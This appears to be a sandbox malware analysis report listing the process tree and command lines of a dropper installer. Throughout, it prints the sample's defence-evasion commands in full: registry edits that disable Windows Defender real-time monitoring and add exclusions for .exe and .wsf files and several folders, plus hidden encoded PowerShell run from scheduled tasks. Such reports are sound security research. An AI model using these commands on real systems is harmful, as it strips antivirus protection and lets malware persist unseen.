PID 2808 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2760 wrote to memory of 2736 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2760 wrote to memory of 2736 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2760 wrote to memory of 2736 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2760 wrote to memory of 2736 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2760 wrote to memory of 2736 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2760 wrote to memory of 2736 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2760 wrote to memory of 2736 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2808 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe

"C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe"

C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe

.\Install.exe /zUdidqb "525403" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bGTnZQDECKwDuNSWyq" /SC once /ST 23:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe\" FN /WPYdidQFlh 525403 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bGTnZQDECKwDuNSWyq"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bGTnZQDECKwDuNSWyq

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bGTnZQDECKwDuNSWyq

C:\Windows\system32\taskeng.exe

taskeng.exe {3DAE1449-CDA4-4226-8985-B018D56D1073} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe

C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe FN /WPYdidQFlh 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ghUyIvHdE" /SC once /ST 12:35:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ghUyIvHdE"

C:\Windows\system32\taskeng.exe

taskeng.exe {D1709687-3FBC-4334-BC33-A3736BCAC055} S-1-5-21-2812790648-3157963462-487717889-1000:JAFTUVRJ\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ghUyIvHdE"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gEQVQsQmZ" /SC once /ST 03:59:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gEQVQsQmZ"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gEQVQsQmZ"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\gLbKcqvTyliDAKYm\aZTMZXIn\uWuWZJhWpuxrZztR.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\gLbKcqvTyliDAKYm\aZTMZXIn\uWuWZJhWpuxrZztR.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oBeyQrPqBvPiiLVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oBeyQrPqBvPiiLVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oBeyQrPqBvPiiLVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oBeyQrPqBvPiiLVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

